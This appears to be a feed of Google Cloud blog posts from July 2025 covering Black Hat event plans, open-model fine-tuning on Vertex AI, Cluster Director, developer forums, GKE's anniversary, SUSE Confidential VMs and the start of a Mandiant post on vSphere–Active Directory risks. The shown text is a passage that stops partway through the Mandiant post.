Google Cloud

2025 07 25

GCP – Your guide to Google Cloud Security at Black Hat USA 2025

At Google Cloud Security, our mission is to empower organizations to strengthen their defenses with innovative security capabilities, all while simplifying and modernizing their cybersecurity. In a world of evolving threats and increasing complexity, we believe true security comes from clarity, not more noise.

We’re excited to bring this commitment to innovation and simplification to Black Hat USA 2025, where you can discover how Google Cloud Security and Mandiant can help you navigate the complex threat landscape, adopt agentic security, and make Google an extension of your security team.

From connecting with our security experts to witnessing innovative cloud security technology in action, we’re offering Black Hat attendees a packed schedule of booth activities, insightful sessions, and exclusive events.

Visit our booth and connect with experts

Booth #2240 is where you can meet the Google Cloud Security team. Discover our latest innovations and learn directly from Mandiant experts about the techniques and tactics from their most recent investigations. See firsthand how agentic security can help you detect and remove threats more effectively and make your security team more productive.

Experience our expanded demo landscape

Catch our on-demand product and service demos during Business Hall/Expo hours to learn how Google Cloud Security can protect your organization. Plus, connect with our security experts and partners to discuss your specific needs.

Google Threat Intelligence: Experience how you can get ahead of the latest threats with Google Threat Intelligence. Know who’s targeting you and focus on the most relevant threats to your organization.
Google Security Operations: Discover how our intelligence-driven and AI-powered security operations platform, Google Security Operations, combines Google’s hyper-scale infrastructure along with unparalleled visibility and understanding of cyber adversaries to enable security teams to uncover the latest cyber threats in near real-time.
AI for Defenders: Learn how AI agents in Google Cloud Security products can autonomously investigate threats, triage alerts and resolve misconfigurations. Join us as we demo how AI agents can automate manual and repetitive tasks to help you move from insight to action faster.
Cloud Security: Explore how Google Cloud provides built-in, secure controls to help you maintain a strong cloud security posture. See in action how Google Cloud’s Security Foundation recommended products help address most common cloud adoption use cases.
Mandiant Incident Response: Learn how Mandiant uses frontline experience with threat intelligence and incident response to help organizations like yours tackle top cloud security challenges.
Chrome Enterprise: Stop by to find out why Chrome is the most trusted enterprise browser, meeting the secure enterprise browsing needs of today’s workforce.

Join us at Google Cloud Security Hub

Beyond the main expo hall, make your way to the Google Cloud Security Hub, located conveniently in The Cove next to Libertine Social at Mandalay Bay. From the expo hall, head past the Starbucks, and our Customer Hub will be on your right. Here’s a detailed map for easy way-finding:

How to find Google Cloud at the conference.

The Hub is home to several exclusive events and spaces:

Enjoy the exclusive Customer Lounge

Looking for a place to recharge and connect in a more relaxed setting? If you schedule a meeting with our team, you’ll gain exclusive access to our Customer Lounge at the Google Hub. We’ll have snacks, beverages, and a comfortable space for you to take a break from the conference floor. Reach out to your sales representative to schedule your meeting and get on the guest list.

Unwind at the Google Cloud Security Happy Hour

Join us for the Google Cloud Security Happy Hour on Wednesday, Aug. 6, from 5:00 p.m. to 7:00 p.m., at the Google Hub for a relaxed evening of networking. It’s the perfect opportunity to unwind after a day of briefings and connect with our team and your peers.

Attend the Threat Briefing and dinner

Customers are invited to join us for an exclusive Threat Briefing and Dinner on Tuesday, Aug. 5, from 6:00 p.m. to 9:00 p.m., at the Google Hub. You’ll gain deep insights from Mandiant Intelligence, with a special briefing from Luke McNamara, chief deputy analyst.

Enhance your skills with Mandiant Academy training

Improve your expertise with hands-on training directly from Mandiant’s frontline cybersecurity experts. Mandiant Academy is offering the following courses during Black Hat (requires prior registration):

Advanced Topics in Malware Analysis (fee required)
Attacking Mobile Applications: Practical Security Testing for Android and iOS (fee required)
Workshop: ThreatSpace: Hands on APT Hunting with Google Security (no fee)

Dive deep with our breakout sessions

With your Briefing conference pass, you can attend these sessions where Google Cloud Security and Mandiant experts will share their insights:

Bridging the AI reality gap: Join Vijay Ganti (director, product management, Google Cloud Security) and Spencer Lichtenstein (group product manager, Google Security Operations) as they pull back the curtain on AI in security. In the session, they’ll dive deep into how Google is integrating AI into its security products. You’ll learn about the rigorous data science processes we use to measure every task of the end-to-end system, and why this meticulous approach is crucial for giving you an edge against threat actors. We’ll also share the latest, most impactful agent demos.
Participate in an OT Incident Response: Join Tim Gallo (head of global solution architects, Google Cloud Security) and Paul Shaver (global OT security lead, Google Cloud Security) for a unique, interactive session where you can experience what it’s truly like to navigate a critical operational technology (OT) incident. In this live session, you’ll step into the shoes of a Mandiant Incident Responder as we guide you through a simulated OT incident. You’ll see firsthand the crucial decision points, compare your choices with those of our experts, and gain invaluable insights into the complexities of real-world OT incident response.
Autonomous Timeline Analysis and Threat Hunting: An AI Agent for Timesketch: In this talk, we will present the first AI-powered agent capable of autonomously performing digital forensic analysis on the large and varied log volumes typically encountered in real–world incidents. We will demonstrate the agent’s proficiency in threat hunting and evaluate our technique on a dataset of 100 diverse, real-world compromised systems.
The Ransomware Response Playbook: Join this session where security experts will discuss how best to prepare for and handle a ransomware extortion attack against your business. This panel discussion will explore critical questions such as: Where is the malicious payload and how is it spreading? How do you interact and barter with your attacker (or not)? Who do you call? Are your backups protected?
At its core, FACADE is a novel self-supervised ML system that detects suspicious actions by analyzing the context of corporate logs, leveraging a unique contrastive learning strategy. This, combined with an innovative clustering approach, leads to unparalleled accuracy: a false positive rate under 0.01%, and as low as 0.0003% for single rogue actions. This session will not only present the underlying technology but also demonstrate how to use the recently released FACADE open-source version to protect your own organization.

Threat Space Workshop: Join Nadean Tanner for this hands-on experience with Harbinger, an AI-powered red teaming platform for streamlined operations and enhanced decision-making.

Learn about open-source solutions at Arsenal

Harbinger: An AI-Powered Red Teaming Platform for Streamlined Operations and Enhanced Decision-Making: Harbinger is an AI-powered platform that streamlines your workflow by integrating essential components, automating tasks, and providing intelligent insights. It consolidates data from various sources, automates playbook execution, and uses AI to suggest your next moves, making red teaming more efficient and effective. With Harbinger, you can focus on what matters most – achieving your objectives and maximizing the impact of your assessments.
Timesketch: AI-Powered Super Timeline Analysis: Timesketch is a leading, free open-source software (licensed under Apache-2.0) for collaborative forensic-timeline analysis, with more than 2.6k stars on GitHub. In this arsenal, we announce and showcase Timesketch AI extension designed to drastically speedup (human) analysts, identify compromise root cause analysis and improve incident reaction time.This demo will showcase AI-driven investigations in Timesketch, highlighting its ability to:
- Autonomously analyze timelines, answer investigative questions, identify key events, and find the root cause of compromises.
- Provide interactive review, empowering analysts to verify, edit, and refine AI-generated findings with clear links to supporting facts, emphasizing human validation.
- Facilitate collaborative timeline analysis by integrating with Timesketch’s collaborative environment, enabling teamwork on AI-powered investigations.

Meet you there

Black Hat USA 2025 promises to be an impactful week, and Google Cloud Security is ready to share valuable knowledge and innovative solutions. We encourage you to make the most of your time by visiting our booth, attending our sessions, re-energizing at the Google Cloud Security Hub, and connecting with our team.

We’re eager to discuss your security challenges and demonstrate how Google can be your strategic security partner in the face of evolving threats.

Read More for the details.

2025 07 25

GCP – Your guide to taking an open model from discovery to a production-ready endpoint on Vertex AI

Tibor Kiss Cloud, Google Cloud gcp

Developers building with gen AI are increasingly drawn to open models for their power and flexibility. But customizing and deploying them can be a huge challenge. You’re often left wrestling with complex dependencies, managing infrastructure, and fighting for expensive GPU access.

Don’t let that complexity slow you down.

In this guide, we’ll walk you through the end-to-end lifecycle of taking an open model from discovery to a production-ready endpoint on Vertex AI. In this blog post, we will use fine-tuning and deploying Qwen3 as our example, showing you how to handle the heavy lifting so you can focus on innovation.

Part 1: Quickly choose the right base model

So you’ve decided to use an open model for your project: which model, on what hardware, and which serving framework? The open model universe is vast, and the “old way” of finding the right model is time consuming. You could spend days setting up environments, downloading weights, and wrestling with requirements.txt files just to run a single test.

This is a common place for projects to stall. But with Vertex AI, your journey starts in a much better place: the Vertex AI Model Garden, a curated hub that simplifies the discovery, fine-tuning and deployment of cutting-edge open models. With over 200+ validated options (and growing!) including popular choices like Gemma, Qwen, DeepSeek, and Llama. Comprehensive model cards offer crucial information, including details on recommended hardware (such as GPU types and sizes) for optimal performance. Additionally, Vertex AI has default quotas for dedicated on-demand capacity of the latest Google Cloud accelerators to make it easier to get started.

Qwen 3 Model card on Vertex AI Model Garden

Importantly, Vertex AI conducts security scans on these models and their containers, which gives you an added layer of trust and mitigating potential vulnerabilities from the outset. Once you found a model, like Qwen3, for your use case, Model Garden provides one-click deployment options or pre-configured notebooks (code) making it easy to deploy the model as an endpoint using Vertex AI inference Service, ready to be integrated into your application.

Qwen3 Deployment options from Model Garden

Additionally, Model Garden provides optimized serving containers—often leveraging vLLM or SGLang, or Hex-LLM for high-throughput inference — specifically designed for performant model serving. Once your model is deployed (via an experimental endpoint or notebook) you can start experimenting and establishing a baseline for your use case. This baseline lets us benchmark our fine-tuned model later on.

It’s important that you incorporate evaluation early on in the process. You can leverage Vertex AI’s Gen AI evaluation service to assess the model against your own data and criteria, or integrate open-source frameworks. This essential early validation ensures you confidently select the right base model.

By the end of this experimentation and research phase, you’ll have efficiently navigated from model discovery to initial evaluation ready for the next step.

Part 2: Start parameter efficient fine-tuning (PEFT) with your data

You’ve found your based model – in this case Qwen3. Now for the magic: making it yours by fine-tuning it on your specific data. This is where you can give the model a unique personality, teach it a specialized skill, or adapt it to your domain.

Step 1: Get your data ready
First you need to get your data ready. Reading data can often be a bottleneck, but Vertex AI makes it simple. You can seamlessly pull your datasets directly from Google Cloud Storage (GCS) and BigQuery (BQ). For more complex data-cleaning and preparation tasks, you can build an automated Vertex AI Pipeline to orchestrate the preprocessing work for you.

Step 2: Hands-on tuning in the notebook
Now you can start fine-tuning your Qwen3 model. For Qwen3, the Model Garden provides a pre-configured notebook that uses Axolotl, a popular framework for fine-tuning. This notebook already includes optimized settings for techniques like:

QLoRA: A highly memory-efficient tuning method, perfect for running experiments without needing massive GPUs.
FSDP (Fully shared data parallelism): A technique for distributing a large model across multiple GPUs for larger scale training.

You can run the Qwen3 fine-tuning process directly inside the notebook. This is the perfect “lab environment” for quick experiments to discover the right configuration for the fine-tuning job.

Step 3: Scaling up with Vertex AI training
Experimenting and getting started in a notebook is great, but you might need more GPU resources and flexibility for customization. This is when you graduate from the notebook to a formal Vertex AI Training job.

Instead of being limited by a single notebook instance, you submit your training configuration (using the same container) to Vertex AI’s managed training service offering more scalability, flexibility and control. Here’s what that gives you:

On-demand accelerators: Access an on-demand pool of the latest accelerators (like H100s) when you need them or choose DWS Flex start, spot GPUs, BYO-reservation options for more flexibility or stability.
Managed infrastructure: No need to provision or manage servers or containers. Vertex AI handles it all. You just define your job, and it runs.
Reproducibility: Your training job is a repeatable artifact, making it easier to be used in a MLOps workflow.

Once your job is running, you can monitor its progress in real-time with TensorBoard to watch your model’s loss and accuracy improve. You can also check in on your tuning pipeline.

Beyond using the Vertex AI Training Job you can go with Ray on Vertex or DIY on GKE or GCE based on flexibility and control needed.

Part 3: Evaluate your fine-tuned model

After fine-tuning your Qwen3 model on Vertex AI, robust evaluation is crucial to assess its readiness. You compare the evaluation results to your baseline created during experimentation.

For complex generative AI tasks, Vertex AI’s Gen AI Evaluation Service uses a ‘judge’ model to assess nuanced qualities (coherence, relevance, groundedness) and task-specific criteria, supporting side-by-side (SxS) human reviews. Using the GenAI SDK, you can programmatically evaluate and compare your models. This service provides deep, actionable insights into model performance—going far beyond simple metrics like perplexity by also incorporating automated side-by-side comparisons and human review.

In the evaluation notebook, We evaluated our fine-tuned Qwen3 model against the base model using the GenAI Evaluation Service. For each query, we provided responses from both models and used the pairwise_summarization_quality metric to let the judge model determine which performed better.

For evaluation on other popular models, refer to this notebook

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e2770f9b4c0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>

Part 4: Deploy to a production endpoint

Your model has been fine-tuned and validated. It’s time for the final, most rewarding step: deploying it as an endpoint. This is where many projects hit a wall of complexity. With Vertex AI inference it’s a streamlined process. When you deploy to a Vertex AI Endpoint, you’re not just getting a server; you’re getting a fully managed, production-grade serving stack optimized for two key things:

1. Fast performance

Optimized serving: Your model is served using a container built with cutting-edge frameworks like vLLM, ensuring high throughput and low latency.
Rapid start-up: Techniques like fast VM startup, container image streaming, model weight streaming, and prefix caching mean your model can start up quickly.

2. Cost-effective and flexible scaling

You have full control over your GPU budget. You can:

Use on-demand GPUs for standard workloads.
Apply existing Committed Use Discounts (CUDs) and reservations to lower your costs.
Use Dynamic Workload Scheduler (DWS) Flex Start to acquire capacity for up to 7 days at a discount.
Leverage Spot VMs for fault-tolerant workloads to get access to compute at a steep discount.

In short, Vertex AI Inference handles the scaling, the infrastructure, and the performance optimization. You just focus on your application.

Get started

Successfully navigating the lifecycle of an open model like Qwen on Vertex AI, from initial idea to production-ready endpoint, is a significant achievement. You’ve seen how the platform provides robust support for experimentation, fine-tuning, evaluation, and deployment.

Want to explore your own open model workload? The Vertex AI Model Garden is a great place to start.

Read More for the details.

2025 07 24

GCP – New Cluster Director features: Simplified GUI, managed Slurm, advanced observability

Tibor Kiss Cloud, Google Cloud gcp

In April, we released Cluster Director, a unified management plane that makes deploying and managing large-scale AI infrastructure simpler and more intuitive than ever before, putting the power of an AI supercomputer at your fingertips. Today, we’re excited to release new features in preview including an intuitive interface, managed Slurm experience, and observability dashboard that intercepts performance anomalies.

From complex configuration to easy creation

AI infrastructure users can spend weeks wrestling with complex configurations for compute, networking, and storage. Because distributed training workloads are highly synchronized jobs across thousands of nodes and are highly sensitive to network latency, performance bottlenecks can be difficult to diagnose and resolve. Cluster Director solves these challenges with a single, unified interface that automates the complex setup of AI and HPC clusters, integrating Google Cloud’s optimized compute, networking, and storage into a cohesive, performant, and easily managed environment.

LG Research uses Google Cloud to train their large language models, most recently Exaone 3.5. They have significantly reduced the time it takes to have a cluster running with their code — from over a week to less than one day. That’s hundreds of GPU hours saved for real workloads.

“Thanks to Cluster Director, we’re able to deploy and operate large-scale, high-performance GPU clusters flexibly and efficiently, even with minimal human resources.” – Jiyeon Jung, AI Infra Sr Engineer, LG AI Research

Biomatter uses Google Cloud to scale their in silico design processes. Cluster Director has made the cluster deployment and management smooth, enabling them to dedicate more focus to the scientific challenges at the core of their work.

“Cluster Director on Google Cloud has significantly simplified the way we create, configure, and manage Slurm-based AI and HPC clusters. With an intuitive UI and easy access to GPU-accelerated instances, we’ve reduced the time and effort spent on infrastructure.” – Irmantas Rokaitis, Chief Technology Officer, Biomatter

Read on for what’s new in the latest version of Cluster Director.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud infrastructure’), (‘body’, <wagtail.rich_text.RichText object at 0x3e03bd28f970>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/compute’), (‘image’, None)])]>

Simplified cluster management across compute, network, and storage

Use a new intuitive view in the Google Cloud console to easily create, update, and delete clusters. Instead of a blank slate, you start with a choice of validated, optimized reference architectures. You can add one or more machine configurations from a range of VM families (including A3 and A4 GPUs) and specify the machine type, the number of GPUs, and the number of instances. You can choose your consumption model, selecting on-demand capacity (where supported), DWS Calendar or Flex start modes, Spot VMs for cost savings, or attaching a specific reservation for capacity assurance.

Cluster Director also simplifies networking by allowing you to deploy the cluster on a new, purpose-built VPC network or an existing one. If you create a new network, the firewall rules required for internal communication and SSH access are configured automatically, removing a common pain point. For storage, you can create and attach a new Filestore or Google Cloud Managed Lustre instance, or connect to an existing Cloud Storage bucket. These integrations help ensure that your high-performance file system is correctly mounted and available to all nodes in the cluster from the moment they launch.

Powerful job scheduling with Managed Slurm

Cluster Director provides fault-tolerant and highly scalable job scheduling out of the box with a managed, pre-configured Slurm environment. The controller node is managed for you, and you can easily configure the login nodes, including machine type, source image, and boot-disk size. Partitions and nodesets are pre-configured based on your compute selections, but you retain the flexibility to customize them, now or in the future.

Topology-aware placement

To maximize performance, Cluster Director is deeply integrated with Google’s network topology. This begins when clusters are created, when VMs are placed in close physical proximity. Crucially, this intelligence is also built directly into the managed Slurm environment. The Slurm scheduler is natively topology-aware, meaning it understands the underlying physical network and automatically co-locates your job’s tasks on nodes with the lowest-latency paths between them. This integration of initial placement and ongoing job scheduling is a key performance enhancer, dramatically reducing network contention during large, distributed training jobs.

Comprehensive visibility and insights

Cluster Director’s integrated observability dashboard provides a clear view of your cluster’s health, utilization, and performance, so you can quickly understand your system’s behavior and diagnose issues in a single place. The dashboard is designed to easily scale to tens of thousands of VMs.

Advanced diagnostics to detect performance anomalies

In distributed ML training, stragglers refer to small numbers of faulty or slow nodes that eventually slow down the entire workload. Cluster Director makes it easy to quickly find and replace stragglers to avoid performance degradation and wasted spend.

Try out Cluster Director today!

We are excited to invite you to be among the first to experience Cluster Director. To learn more and express your interest in joining the preview, talk to your Google Cloud account team or sign up here. We can’t wait to see what you will build.

Read More for the details.

2025 07 24

GCP – Announcing the new Google Developer Program forums

Tibor Kiss Cloud, Google Cloud gcp

Building applications is sometimes messy, it’s always iterative, and it often works best when it’s collaborative. As a developer, you regularly experience the frustration of a cryptic error message and the quiet triumph of finding a clever workaround. Either way, finding help or sharing success is best facilitated by a community of builders.

That’s why we are excited to launch the Google Developer Program forums at at discuss.google.dev. The new forums are designed to help people build with Google technology. You will find discussion groups to engage with other developers and Google experts; how-to articles, reference architectures and use cases; and a community of users looking to help.

We’re also migrating the existing Google Cloud, Workspace Developer, AppSheet, and Looker communities, channels and content from googlecloudcommunity.com over to discuss.google.dev. So, existing knowledge isn’t lost – it’s just moving to a new home. And by migrating the community we’re able to focus on two core principles in the new design: high trust and high utility.

Signal over noise

Your Google Developer Program profile is how you will access the forums. By unifying our sign-in, and connecting forum profiles directly to Google Developer Program profiles, we can programmatically display your earned credentials and reputation which you’ve earned through learning, events, and meetups that happen across the Google ecosystem.

aside_block: <ListValue: [StructValue([(‘title’, ‘Not a Google Developer Program member yet?’), (‘body’, <wagtail.rich_text.RichText object at 0x3e03bd2a8580>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

We’re starting with the Google Developer Expert flair icon next to a user’s name and we plan to extend this to other programs in the near future. Additionally, if you are part of a private product beta or Early Access Program (EAP), your forum account is automatically granted access to the corresponding private discussion groups. No more filling out forms or waiting for permissions. Your Developer Program profile is your passport.

Why we chose Discourse for our new forums

While we were tempted to build a custom solution from scratch we chose Discourse for a few key reasons:

Built by and for developers: Discourse is an open-source platform that prioritizes function over flash with markdown, code formatting, keyboard navigation, and structured conversations.
Extensibility: Its robust API and plugin architecture allow us to integrate our own Google technologies—like Gemini-powered spam filtering and the Google Developer Program—without reinventing the wheel.

This is your invitation!

This new community is a space for all of us. Come say hello! Ask a question, or answer one. Share what you’re working on, or get help with what you’re stuck on. This is where the real work happens, and we want to be a part of it with you.

In the coming months, you’ll see more of our engineers, product managers, and developer advocates join the conversation to not only help answer questions, but also ask them, share their own ideas, and engage with the same passion as you do. They won’t always have a perfect solution to a tricky question, but they’re committed to listen, engage, and work with the community to find the best path forward.

How to Get Started

Explore Now: Visit https://discuss.google.dev. Browse the categories, read ongoing discussions, and find your community.
Join the Conversation: If you’re a Google Developer Program member, sign in and dive in! Ask those tough questions, share your solutions, and contribute your expertise. Not a member yet? Visit developers.google.com/program to learn more and join at no-cost.
For googlecloudcommunity.com users: We’re working to make the transition as smooth as possible. You’ll find familiar topics and a wealth of historical discussions here. We encourage you to explore and continue your conversations on this new, unified platform.

Read More for the details.

2025 07 23

GCP – Celebrating 10 years of GKE: Incredible customer journeys, amazing AI futures

Tibor Kiss Cloud, Google Cloud gcp

The evolution of the cloud has been tremendous over the past decade. Every step of the way, Google Kubernetes Engine (GKE) has been there to meet new challenges. From giving DevOps more scalable foundations to supporting the rise of cloud-native AI, we took Kubernetes’ brilliance and gave it the fully managed service it deserved to thrive.

GKE turns 10 this year, and to celebrate, we’ve launched 10 years of GKE, an ebook that explores this incredible decade and how customers have built global businesses powered on this managed platform. We released Kubernetes as open source in 2014, and one million contributions later, we couldn’t be prouder of what Kubernetes has become, its history, and its future with GKE.

GKE’s leading lights

One of the earliest GKE customers was Signify, a global leader in lighting for professionals and the company behind Philips Hue. Ten years on, it continues to thrive on the service. Growing from 200 million to 3.5 billion daily transactions, Signify scaled from one GKE cluster to seven, and is looking to leverage GKE for new workloads, including platform engineering and AI for multi-cluster supervision.

“The constant improvements made by GKE over the past 10 years profoundly changed the way we design, deploy, and evolve our services,” says Leon Bouwmeester, Director of Engineering and Head of Hue Platform at Signify. “We spend less time on infrastructure management and can focus our efforts on what really matters: the quality of the user experience and the speed of innovation.”

However, what put GKE on the map was Pokémon GO, Niantic’s ground-breaking geolocation game. As millions took to the streets to catch ‘em all, GKE brought to life and kept up with its explosive launch. “Never have I taken part in anything close to the growth that Google Cloud customer Niantic experienced with the launch of Pokémon GO,” says Luke Stone, director of customer reliability engineering at Google Cloud.

Target vs. worst case vs. actual traffic to GKE during Niantic’s launch of Pokémon Go — Target vs. worst case vs. actual traffic to GKE during Niantic’s launch of Pokémon Go.

AI for tomorrow on GKE today

Today, GKE supports brand new businesses in the rapidly evolving world of AI. Customers report how their AI initiatives are made more powerful on GKE, helping them manage the complex demands of their deployments. This means flexibility and scale for AI workloads and cost-efficient inference — so you can focus on training, not managing.

With GKE Autopilot, AI can also help you optimize your configurations and workloads. In the ebook, learn more about how GKE Autopilot mode frees up teams to focus on innovation, with businesses sharing how they automatically improved performance and cost savings — with the stability and security they expect from Google Cloud.

Join the celebration by exploring 10 years of GKE for yourself. We‘ve distilled a decade of insights into what makes GKE so effective, thoughts from customers on how GKE is supporting their work at scale, and why we’re ready for everything AI has in store for the decade ahead. It’s been an amazing ride, and with AI reshaping the future of application development, we’re just getting started.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3e1ececfbf40>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/marketplace/product/google/container.googleapis.com’), (‘image’, None)])]>

Read More for the details.

2025 07 23

GCP – How SUSE and Google Cloud collaborate on Confidential Computing

Tibor Kiss Cloud, Google Cloud gcp

Securing sensitive data is a crucial part of moving workloads to the cloud. While encrypting data at rest and in transit are standard security practices, safeguarding data in use — while it’s actively being processed in memory — can present unique security and privacy challenges.

To make sure that data in use is also protected, we developed Confidential Computing with our hardware partners to use hardware-based Trusted Execution Environments (TEEs) to isolate and safeguard data in use, even from the cloud provider hosting the data.

To help build a secure and reliable cloud environment, we’ve partnered with SUSE, a global leader in open source and secure enterprise solutions. Together, we’ve developed targeted solutions that can enable organizations to run their sensitive workloads in the cloud, combining the hardware-based security of Google Cloud Confidential Virtual Machines (Confidential VMs) with the security of SUSE Linux Enterprise Server (SLES).

Today, we are excited to announce that SUSE Linux Enterprise Server now supports Google Cloud Confidential VMs that have Confidential Computing technologies AMD SEV, AMD SEV-SNP, or Intel TDX enabled. Previously, SLES was only generally available on AMD SEV and AMD SEV-SNP-based Confidential VMs, but now SLES is also generally available on Intel TDX-based Confidential VMs which run on the performant C3 machine series. This new offering provides customers more choice and flexibility in securing sensitive workloads, while expanding Confidential VM support for guest operating system images.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e1ececa2790>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

At Google Cloud, we strongly advocate for a layered approach to security. Here, SUSE Linux Enterprise Server (SLES) strengthens the guest OS layer, while Confidential VMs strengthen the infrastructure layer. Additionally, the comprehensive SLES security portfolio can help support compliance, risk mitigation, and cybersecurity best practices:

Meeting compliance requirements: SLES is designed to help organizations meet regulatory requirements through its security features. SLES comes with Federal Information Processing Standards (FIPS) 140-3 certified cryptographic modules.
Ensuring a certified secure software supply chain: SUSE maintains an evaluated secure software supply chain with a Common Criteria Evaluation Assurance Level (EAL) 4+ certification. SUSE’s build service follows Supply Chain Levels for Software Artifacts (SLSA) Level 4 [v. 0.1] and Level 3 [v. 1.0]. Software Bill of Materials (SBOM) material is available in SPDX 2.0 and CycloneDX.
Reducing evaluation effort: Utilizing SLES with supplier certifications can help customers streamline their evaluation processes by referencing existing certifications.
Hardening automatically: SLES includes an automated hardening process that can help with Security Technical Implementation Guide (STIG)-compliant hardening during setup with YAST or AutoYAST, which can be adjusted as needed.

The combination of SLES within Google Cloud Confidential VMs can offer several benefits:

Complementing encryption with a secure OS: With its security focus and certifications, SLES can provide a hardened operating system in a trusted environment, making both applications and the OS less susceptible to vulnerabilities.
Supporting integrity and trustworthiness: Customers can have greater confidence that both the hardware and the operating system are working as expected. Confidential VMs offer remote attestation, allowing verification of the VM identity and state. Running a secure OS, such as SLES, on an attested Confidential VM can support overall data and code integrity.
Supporting Confidential Computing technologies: By providing a consistent and secure operating system across all Google Cloud Confidential Computing types (AMD SEV, AMD SEV-SNP, and Intel TDX), SLES can help simplify the deployment and management of sensitive cloud workloads.
Enhancing compliance in sensitive environments: For workloads that require a notable level of data protection due to compliance regulations, this joint security solution of SLES on Confidential VMs can help alleviate cloud migration concerns from internal auditors.
Addressing internal and external threats: While Confidential Computing primarily can help protect against external threats like hypervisors, running a security-focused OS like SLES in a Confidential VM can offer an additional layer of protection against potential internal vulnerabilities in the guest OS itself.
Reinforcing data ownership and control: Confidential Computing can help provide technical assurances that you have retained control and effective ownership of your data, even when your data is processed in the cloud. By encrypting data in use and limiting access to only your authorized workloads within a TEE, you can gain stronger assurances for your digital sovereignty.
Extending Zero Trust to execution: By encrypting data in memory on the CPU, this solution extends the Zero Trust principle of “never trust, always verify” to data even when it’s actively being processed. This ensures data remains secure and encrypted throughout its lifecycle, including during execution, helping to enforce a real Zero Trust environment.
Establishing a secure foundation for cloud-native workloads: With SLES providing a secure base and Google Cloud Confidential VMs offering hardware-level protection, this environment together with SUSE Cloud Native solutions can deliver a robust foundation for your most sensitive cloud-native applications. By securing the underlying compute resources, you can extend data-in-use protection to higher level containerized and cloud-native workloads.

Organizations can confidently move regulated and confidential applications to Google Cloud, knowing their data is supported throughout its lifecycle, including while in use and with a secure guest OS, to bolster their digital sovereignty.

To learn more about securing sensitive data in the cloud, you can create a Confidential VM with SLES today.

Read More for the details.

2025 07 23

GCP – Beyond Convenience: Exposing the Risks of VMware vSphere Active Directory Integration

Tibor Kiss Cloud, Google Cloud gcp

Written by: Stuart Carrera, Brian Meyer

Executive Summary

Broadcom’s VMware vSphere product remains a popular choice for private cloud virtualization, underpinning critical infrastructure. Far from fading, organizations continue to rely heavily on vSphere for stability and control. We’re also seeing a distinct trend where critical workloads are being repatriated from public cloud services to these on-premises vSphere environments, influenced by strategies like bimodal IT and demands for more operational oversight.

The common practice of directly integrating vSphere with Microsoft Active Directory (AD), while simplifying administration tasks, creates an attack path frequently underestimated due to a misunderstanding of the inherent risks presented today. This configuration extends the AD attack surface directly to the hypervisor. From a threat actor’s perspective, this integration constitutes a high-value opportunity. It transforms the relatively common task of compromising AD credentials into a potential high value scenario, granting access to the underlying infrastructure hosting the servers and in turn allowing them to gain privileged administrative control over ESXi hosts and vCenter and ultimately seize complete command of the virtualized infrastructure.

Ransomware aimed at vSphere infrastructure, including both ESXi hosts and vCenter Server, poses a uniquely severe risk due to its capacity for immediate and widespread infrastructure paralysis. With the end of general support for vSphere 7.x approaching in October 2025—the version Mandiant has observed to be running by a large majority of organizations—the threat of targeted ransomware has become urgent. As recovering from such an attack requires substantial time and resources, proactive defense is paramount. It is therefore critical for organizations to understand the specific threats against these core components and implement effective, unified countermeasures to prevent their compromise, especially before support deadlines introduce additional risk.

This blog post will logically break down the inherent risks and misunderstandings with integrating vSphere with Microsoft AD. Using Mandiant’s deep experience of both vSphere ransomware incidents and proactive assessments of both AD and vSphere, we will provide a directive for understanding risk and increasing security posture aligned with today’s threats in respect of enterprise vSphere management.

After learning about the risks, our next blog post contains actionable guidance on how to defend your VMware vSphere estate. Additionally, register for our upcoming webinar to learn these strategies directly from Mandiant experts.

vSphere Infrastructure Overview

To understand the security risks in a vSphere environment, it’s essential to understand its architecture. A compromise at one layer can have cascading effects throughout the entire virtualized environment.

At its core, vSphere is a platform that pools physical datacenter resources like compute, storage, and networking into a flexible layer of virtual infrastructure, a task primarily accomplished by two key components, ESXi and vCenter, as shown in the following diagram:

ESXi (The Hypervisor): This is the foundational layer of vSphere. ESXi is a bare metal hypervisor, meaning it installs directly onto the physical server hardware without requiring an underlying operating system. Its core job is to partition that server into multiple, isolated virtual machines (VMs). Each VM, which is essentially just a collection of files, runs its own operating system and applications, acting like an independent computer. The hypervisor’s minimal design is intentional, aiming to reduce its own attack surface while efficiently managing the server’s resources.
vCenter (The Control Plane): If ESXi hosts are the workers, the vCenter Server is the “brain” or control plane for the entire environment. It provides a single web-based interface to manage all connected ESXi hosts and the VMs they run. ESXi hosts are registered with vCenter, which uses agents on each host to manage operations and enable advanced features like automatic workload balancing and high availability for failover protection.

Integrating vSphere with AD creates a flexible environment that simplifies identity management, yet it introduces profound security risks. This direct link can turn an AD compromise into a significant threat against the entire vSphere deployment.

An Outdated Blueprint: Re-examining Foundational vSphere Security

Virtualization has been a cornerstone of enterprise IT for nearly two decades, solving server sprawl and delivering transformative operational agility. Alongside it, AD remains a pillar of enterprise IT. This has led to a long-standing directive that all enterprise technology, including critical infrastructure like vSphere, must integrate with AD for centralized authentication. The result is a risky dependency—the security of foundational infrastructure is now directly tied to the security of AD, meaning any compromise within AD becomes a direct threat to the entire virtualization environment.

In the past, vSphere security was often approached in distinct, siloed layers. Perimeter security was stringent, and threats were typically viewed as internal, such as configuration errors, rather than from external threat actors. This, combined with the newfound ease of image-based backups, often led to security efforts becoming primarily focused on robust business continuity and disaster recovery capabilities over proactive defense. As environments expanded, managing local user accounts created significant administrative overhead, so support for AD integration was introduced for centralized identity management.

